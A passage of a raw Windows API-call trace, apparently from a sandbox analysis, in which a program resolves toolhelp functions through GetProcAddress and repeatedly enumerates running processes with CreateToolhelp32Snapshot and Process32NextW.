lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.492] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x71ca59c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0221.493] GetProcAddress (hModule=0x75900000, lpProcName="Module32First") returned 0x75990859 [0221.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0221.493] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x71ca59c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0221.494] GetProcAddress (hModule=0x75900000, lpProcName="Module32Next") returned 0x75990942 [0221.494] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.494] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x71ca59c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0221.494] GetProcAddress (hModule=0x75900000, lpProcName="Module32FirstW") returned 0x7593c59e [0221.494] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.494] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x71ca59c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0221.495] GetProcAddress (hModule=0x75900000, lpProcName="Module32NextW") returned 0x7593c11f [0221.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0221.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x71ca59c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0221.496] GetProcAddress (hModule=0x75900000, lpProcName="Module32FirstW") returned 0x7593c59e [0221.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x71ca59c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0221.497] GetProcAddress (hModule=0x75900000, lpProcName="Module32NextW") returned 0x7593c11f [0221.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x66c [0221.501] Process32FirstW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.502] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.503] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.504] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.505] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.506] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.506] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.507] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.508] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.509] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.510] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.510] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.511] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.512] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.513] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.514] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.515] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.515] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.516] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x308, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.517] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.518] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.518] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.519] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.520] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="jusched.exe")) returned 1 [0221.521] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.522] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0221.522] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9e, th32ParentProcessID=0x644, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0221.523] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.524] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.525] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.525] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.526] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.527] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.528] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0221.528] Process32NextW (in: hSnapshot=0x66c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0221.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x67c [0221.533] Process32FirstW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.534] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.534] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.535] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.536] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.537] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.537] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.538] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.539] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.539] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.540] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.541] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.541] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.542] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.543] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.543] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.581] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.582] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.582] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x308, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.583] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.583] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.584] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.584] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.585] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="jusched.exe")) returned 1 [0221.585] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.586] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0221.587] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9e, th32ParentProcessID=0x644, pcPriClassBase=8, dwFlags=0x0, szExeFile="httpd.exe")) returned 1 [0221.587] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.588] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.588] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.589] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.589] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.590] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.590] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0221.591] Process32NextW (in: hSnapshot=0x67c, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0221.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x944 [0221.594] Process32FirstW (in: hSnapshot=0x944, lppe=0x68ff420 | out: lppe=0x68ff420*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.595] Process32NextW (in: hSnapshot=0x944, lppe=0x68ff420 | out: 